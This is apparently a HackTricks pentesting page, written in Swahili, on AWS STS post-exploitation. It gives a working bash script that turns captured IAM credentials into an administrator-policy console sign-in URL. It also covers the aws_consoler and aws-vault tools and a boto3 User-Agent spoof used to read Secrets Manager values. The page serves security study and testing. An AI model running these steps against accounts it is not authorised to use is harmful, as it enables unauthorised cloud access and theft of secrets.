# AWS - STS Post Exploitation

{{#include ../../../banners/hacktricks-training.md}}

## STS

Kwa maelezo zaidi:

{{#ref}}
../aws-services/aws-iam-enum.md
{{#endref}}

### Kutoka kwa IAM Creds hadi Console

Ikiwa umeweza kupata baadhi ya akreditivu za IAM huenda ukavutiwa na **kuingia kwenye web console** ukitumia zana zifuatazo.\
Kumbuka kwamba mtumiaji/role lazima iwe na ruhusa **`sts:GetFederationToken`**.

#### Skripti ya Kawaida

Skripti ifuatayo itatumia profaili ya kawaida na eneo la kawaida la AWS (sio gov na sio cn) kukupa URL iliyosainiwa ambayo unaweza kutumia kuingia ndani ya web console:
```bash
# Get federated creds (you must indicate a policy or they won't have any perms)
## Even if you don't have Admin access you can indicate that policy to make sure you get all your privileges
## Don't forget to use [--profile <prof_name>] in the first line if you need to
output=$(aws sts get-federation-token --name consoler --policy-arns arn=arn:aws:iam::aws:policy/AdministratorAccess)

if [ $? -ne 0 ]; then
echo "The command 'aws sts get-federation-token --name consoler' failed with exit status $status"
exit $status
fi

# Parse the output
session_id=$(echo $output | jq -r '.Credentials.AccessKeyId')
session_key=$(echo $output | jq -r '.Credentials.SecretAccessKey')
session_token=$(echo $output | jq -r '.Credentials.SessionToken')

# Construct the JSON credentials string
json_creds=$(echo -n "{\"sessionId\":\"$session_id\",\"sessionKey\":\"$session_key\",\"sessionToken\":\"$session_token\"}")

# Define the AWS federation endpoint
federation_endpoint="https://signin.aws.amazon.com/federation"

# Make the HTTP request to get the sign-in token
resp=$(curl -s "$federation_endpoint" \
--get \
--data-urlencode "Action=getSigninToken" \
--data-urlencode "SessionDuration=43200" \
--data-urlencode "Session=$json_creds"
)
signin_token=$(echo -n $resp | jq -r '.SigninToken' | tr -d '\n' | jq -sRr @uri)


# Give the URL to login
echo -n "https://signin.aws.amazon.com/federation?Action=login&Issuer=example.com&Destination=https%3A%2F%2Fconsole.aws.amazon.com%2F&SigninToken=$signin_token"
```
#### aws_consoler

Unaweza **kuunda kiungo cha console ya wavuti** na [https://github.com/NetSPI/aws_consoler](https://github.com/NetSPI/aws_consoler).
```bash
cd /tmp
python3 -m venv env
source ./env/bin/activate
pip install aws-consoler
aws_consoler [params...] #This will generate a link to login into the console
```
> [!WARNING]
> Hakikisha mtumiaji wa IAM ana ruhusa ya `sts:GetFederationToken`, au toa jukumu la kuchukua.

#### aws-vault

[**aws-vault**](https://github.com/99designs/aws-vault) ni chombo cha kuhifadhi na kufikia kwa usalama akidi za AWS katika mazingira ya maendeleo.
```bash
aws-vault list
aws-vault exec jonsmith -- aws s3 ls # Execute aws cli with jonsmith creds
aws-vault login jonsmith # Open a browser logged as jonsmith
```
> [!NOTE]
> Unaweza pia kutumia **aws-vault** kupata **kipindi cha kikao cha kivinjari**

### **Kupita vizuizi vya User-Agent kutoka Python**

Ikiwa kuna **kizuizi cha kufanya vitendo fulani kulingana na agent ya mtumiaji** inayotumika (kama vile kupunguza matumizi ya maktaba ya python boto3 kulingana na agent ya mtumiaji) inawezekana kutumia mbinu ya awali **kuungana na konsoli ya wavuti kupitia kivinjari**, au unaweza moja kwa moja **kubadilisha agent ya mtumiaji ya boto3** kwa kufanya:
```bash
# Shared by ex16x41
# Create a client
session = boto3.Session(profile_name="lab6")
client = session.client("secretsmanager", region_name="us-east-1")

# Change user agent of the client
client.meta.events.register( 'before-call.secretsmanager.GetSecretValue', lambda params, **kwargs: params['headers'].update({'User-Agent': 'my-custom-tool'}) )

# Perform the action
response = client.get_secret_value(SecretId="flag_secret") print(response['SecretString'])
```
{{#include ../../../banners/hacktricks-training.md}}